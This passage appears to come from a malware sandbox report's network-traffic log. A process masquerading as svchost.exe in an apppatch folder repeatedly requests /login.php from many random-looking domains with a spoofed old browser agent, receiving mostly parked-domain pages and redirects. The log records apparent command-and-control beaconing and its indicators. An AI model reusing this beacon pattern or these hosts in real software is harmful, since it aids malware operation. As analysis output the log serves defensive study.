                                                                                                                                                                                                          Sep 8, 2024 10:53:29.137320995 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.450045109 CEST307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:29 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          24192.168.2.94975244.221.84.105801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.294235945 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyciz.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.777215958 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:28 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=7426bc2ae984edc036ea6201ba3d56ce|8.46.123.33|1725785608|1725785608|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          25192.168.2.960798103.224.212.108801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.867739916 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyxynyx.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.475028038 CEST340INHTTP/1.1 302 Found
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:53:33 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          set-cookie: __tad=1725785613.7387215; expires=Wed, 06-Sep-2034 08:53:33 GMT; Max-Age=315360000
                                                                                                                                                                                                          location: http://ww25.lyxynyx.com/login.php?subid1=20240908-1853-3379-8a1b-ce08bd3461b1
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          26192.168.2.96079915.197.240.20801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.744252920 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qexyhuv.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.223045111 CEST259INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:34 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          27192.168.2.960800103.224.182.252801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.101811886 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vofycot.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.033274889 CEST338INHTTP/1.1 302 Found
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:53:34 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          set-cookie: __tad=1725785614.8678415; expires=Wed, 06-Sep-2034 08:53:34 GMT; Max-Age=315360000
                                                                                                                                                                                                          location: http://ww16.vofycot.com/login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9e
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          28192.168.2.960801199.59.243.226801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.878065109 CEST350OUTGET /login.php?subid1=20240908-1853-3379-8a1b-ce08bd3461b1 HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww25.lyxynyx.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1725785613.7387215
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.331448078 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:53:34 GMT
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          content-length: 1226
                                                                                                                                                                                                          x-request-id: 40f3fec2-0992-4161-9636-aead2e49500b
                                                                                                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_g0eIVdEUnqWp5pH48oaDcfV46IfEX7NQPUpqyOA1HqVj7ENDagOoCO2FFwn38SE1vJzTgZ06FrKeaQ//UpI+yw==
                                                                                                                                                                                                          set-cookie: parking_session=40f3fec2-0992-4161-9636-aead2e49500b; expires=Sun, 08 Sep 2024 09:08:35 GMT; path=/
                                                                                                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 67 30 65 49 56 64 45 55 6e 71 57 70 35 70 48 34 38 6f 61 44 63 66 56 34 36 49 66 45 58 37 4e 51 50 55 70 71 79 4f 41 31 48 71 56 6a 37 45 4e 44 61 67 4f 6f 43 4f 32 46 46 77 6e 33 38 53 45 31 76 4a 7a 54 67 5a 30 36 46 72 4b 65 61 51 2f 2f 55 70 49 2b 79 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_g0eIVdEUnqWp5pH48oaDcfV46IfEX7NQPUpqyOA1HqVj7ENDagOoCO2FFwn38SE1vJzTgZ06FrKeaQ//UpI+yw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.331476927 CEST660INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                          Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDBmM2ZlYzItMDk5Mi00MTYxLTk2MzYtYWVhZDJlNDk1MDBiIiwicGFnZV90aW1lIjoxNzI1Nzg1NjE1LCJwYWdlX3VybCI6I


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          29192.168.2.96080264.190.63.136801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.306317091 CEST348OUTGET /login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9e HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww16.vofycot.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1725785614.8678415
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983392000 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:53:37 GMT
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_w/CMnnGhcYRuvKXQlgUrjaXKeX1PXOO5vNfb+q8abW4Ilc0j5iHxcFs+NfNpLOwE+ExAs9/vH/D0I9E1zSjetg==
                                                                                                                                                                                                          last-modified: Sun, 08 Sep 2024 08:53:37 GMT
                                                                                                                                                                                                          x-cache-miss-from: parking-7768d5b45d-sb6gc
                                                                                                                                                                                                          server: Parking/1.0
                                                                                                                                                                                                          Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 77 2f 43 4d 6e 6e 47 68 63 59 52 75 76 4b 58 51 6c 67 55 72 6a 61 58 4b 65 58 31 50 58 4f 4f 35 76 4e 66 62 2b 71 38 61 62 57 34 49 6c 63 30 6a 35 69 48 78 63 46 73 2b 4e 66 4e 70 4c 4f 77 45 2b 45 78 41 73 39 2f 76 48 2f 44 30 49 39 45 31 7a 53 6a 65 74 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_w/CMnnGhcYRuvKXQlgUrjaXKeX1PXOO5vNfb+q8abW4Ilc0j5iHxcFs+NfNpLOwE+ExAs9/vH/D0I9E1zSjetg==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983412027 CEST1236INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                          Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com 576has it all. We hope you find what you are searching for!"><link rel="icon" type="im
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983422995 CEST448INData Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65
                                                                                                                                                                                                          Data Ascii: lay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visib
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983474970 CEST1236INData Raw: 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 7d 62 75 74 74 6f 6e 3a 2d 6d 6f 7a 2d 66 6f 63
                                                                                                                                                                                                          Data Ascii: -inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring{outline:1px dotted ButtonText}fieldset{padding:.35em .75em .625em}le
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983485937 CEST1236INData Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 69 6e 67 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78
                                                                                                                                                                                                          Data Ascii: lay:inline-block;text-align:left}.container-buybox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.container-buybox__content-link{color:#949494}.container-buybox__content-link--no-decoration{text-decoration:none
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983495951 CEST1236INData Raw: 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 70 72 69 76 61 63 79 50 6f 6c 69 63 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61
                                                                                                                                                                                                          Data Ascii: ink{font-size:10px;color:#949494}.container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-privacyPolicy__content-link{font-size:10px;color:#949494}.container-cookie-message{position:fixed;bot
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983506918 CEST1236INData Raw: 61 64 64 69 6e 67 3a 34 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 35 35 30 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e
                                                                                                                                                                                                          Data Ascii: adding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__content-body table{width:100%;border-collapse:collapse}
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983519077 CEST1236INData Raw: 69 61 6c 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23
                                                                                                                                                                                                          Data Ascii: ial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{position:relative;display:inline-block;width:60px;height:34px}.switch__slider{position:abs
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983530998 CEST1236INData Raw: 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 61 64 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 77 65 62 61 72 63 68 69 76 65 7b 77 69 64 74 68 3a 33 30 25 3b 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                                                                                                                                                                          Data Ascii: tainer-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:47px;flex-grow:1;width:60px}.container-content__container-ads{margin-top:2.5%}.container-content_
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983627081 CEST1236INData Raw: 20 30 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 69 6d 61 67 65 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e
                                                                                                                                                                                                          Data Ascii: 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-lis
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.988478899 CEST1236INData Raw: 72 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b
                                                                                                                                                                                                          Data Ascii: r,.webarchive-block__list-element-link:active,.webarchive-block__list-element-link:focus{text-decoration:underline}body{margin:0}.domain h1{font-size:2.2em;font-weight:normal;text-decoration:none;text-transform:lowercase;color:#949494}#contain


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          30192.168.2.96330764.225.91.73801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.673578024 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qetyhyg.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:39.253474951 CEST816INHTTP/1.1 200 OK
                                                                                                                                                                                                          server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:53:39 GMT
                                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                                          content-length: 593
                                                                                                                                                                                                          last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                          etag: "63f68860-251"
                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          31192.168.2.96330872.52.179.174801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.990981102 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyhub.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          32192.168.2.96330972.52.179.174801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:39.522095919 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyhub.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                          33192.168.2.96331052.34.198.22980
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.168303013 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
